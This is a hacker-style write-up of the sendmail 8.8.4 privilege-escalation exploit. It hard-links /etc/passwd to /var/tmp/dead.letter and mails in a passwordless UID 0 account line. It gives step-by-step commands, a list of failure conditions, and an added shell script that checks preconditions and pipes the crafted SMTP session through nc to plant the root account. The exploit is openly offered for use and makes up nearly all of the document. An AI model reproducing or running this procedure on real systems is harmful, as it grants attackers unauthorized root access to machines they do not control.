
SendMail 8.8.4 Exploit

"sendmail? 'tis the buggiest program" -phriend-

Ok, here's a brief and interesting explanation of this famous exploit. It
targets sendmail version 8.8.4 and requires that you have a shell account
on the server in question. The trick is a hard link: you link /etc/passwd
to /var/tmp/dead.letter, the file sendmail falls back to when it cannot
deliver a message and cannot return the bounce to the sender either (no
home directory for an unknown sender, so it lands in /var/tmp). Sendmail
does that write as root, so it follows the link and appends the whole
message, headers and body, to /etc/passwd. Very simple really. Below are
the exact commands as you have to type them (for the technically
challenged ones).

   * ln /etc/passwd /var/tmp/dead.letter
   * telnet target.host 25
   * mail from: nonexistent@not.an.actual.host.com
   * rcpt to: nonexistent@not.an.actual.host.com
   * data
   * lord::0:0:leet shit:/root:/bin/bash
   * .
   * quit

Kaboom, you're done. Telnet to port 23 and log in as lord; no password is
required. Thanks to the line we appended, lord has UID 0 and GID 0, so lord
just happens to have the same privileges as root. (The header lines
appended along with the body are not valid passwd entries and are simply
skipped by the password lookup; only the lord line matters.)

There are a couple of reasons why this might not work.

  1. /var and / are different partitions (as you already know, you can't
     make hard links across filesystems; "ln" fails with "Invalid
     cross-device link")
  2. There is a postmaster account on the machine or a mail alias for it,
     in which case your mail will end up there instead of being written
     to /etc/passwd
  3. /var/tmp doesn't exist or isn't publicly writable (the sticky bit
     on /var/tmp is not a problem: it only restricts deleting or renaming
     other people's files, not creating a new link)
  4. The kernel refuses to let you hard-link a file you don't own. Linux
     does this when fs.protected_hardlinks is set to 1, which is the
     default on most current distributions; "ln" then fails with
     "Operation not permitted" and the whole trick is dead before you
     even touch port 25
  5. The target is running something newer than 8.8.4; this hole was
     closed in the sendmail releases that followed
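The procedure and the list of failure conditions above, as one added shell
script that is not part of the original write-up. It checks the
preconditions before touching anything (same filesystem, writable
/var/tmp, and whether the kernel permits a hard link to a root-owned
file), then builds the SMTP dialogue as a single transcript. The use of
nc(1) instead of an interactive telnet session, the HELO line, and the
helper names are assumptions of this example.

```shell
#!/bin/sh
# Added example (not from the original text): pre-flight checks for the
# dead.letter hard-link trick, plus the SMTP session it drives.
# Assumes a POSIX sh, stat(1) in GNU or BSD form, and nc(1) for delivery.

# Device number of a path; GNU stat first, BSD/macOS stat as a fallback.
# Prints nothing (and fails) if the path does not exist.
dev_of() {
  stat -c %d "$1" 2>/dev/null || stat -f %d "$1" 2>/dev/null
}

# 0 if both paths live on the same filesystem, which a hard link requires
# (reason 1 in the list above).
same_fs() {
  a=$(dev_of "$1"); b=$(dev_of "$2")
  [ -n "$a" ] && [ -n "$b" ] && [ "$a" = "$b" ]
}

# 0 if we can create a hard link to TARGET inside DIR.  On Linux with
# fs.protected_hardlinks=1 this fails for files we neither own nor may
# write (reason 4); the probe link is removed again either way.
can_hardlink() {
  target=$1; dir=$2
  probe="$dir/.lnprobe.$$"
  if ln "$target" "$probe" 2>/dev/null; then
    rm -f "$probe"
    return 0
  fi
  return 1
}

# Print the SMTP dialogue from the write-up as one CRLF transcript.  BODY is
# the passwd(5) line; sendmail appends the whole message when it saves
# dead.letter, but only this line parses as a passwd entry.
smtp_session() {
  from=$1; to=$2; body=$3
  printf 'HELO localhost\r\nMAIL FROM:<%s>\r\nRCPT TO:<%s>\r\nDATA\r\n%s\r\n.\r\nQUIT\r\n' \
    "$from" "$to" "$body"
}

# Run the whole procedure against HOST (the machine you have the shell on).
# Returns non-zero, with a reason, if a precondition is not met.
run_exploit() {
  host=$1
  same_fs /etc/passwd /var/tmp || { echo "/var and / are different filesystems"; return 1; }
  [ -d /var/tmp ] && [ -w /var/tmp ] || { echo "/var/tmp missing or not writable"; return 1; }
  can_hardlink /etc/passwd /var/tmp || { echo "kernel refuses the hard link (protected_hardlinks?)"; return 1; }
  ln /etc/passwd /var/tmp/dead.letter || return 1
  smtp_session nonexistent@not.an.actual.host.com nonexistent@not.an.actual.host.com \
    'lord::0:0:leet shit:/root:/bin/bash' | nc "$host" 25
}
```

Usage is `run_exploit target.host`; on a current Linux box the third check
is the one that normally stops it, which is exactly why this exploit is
historical.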

Duncan Silver 
www.hackersclub.com/uu
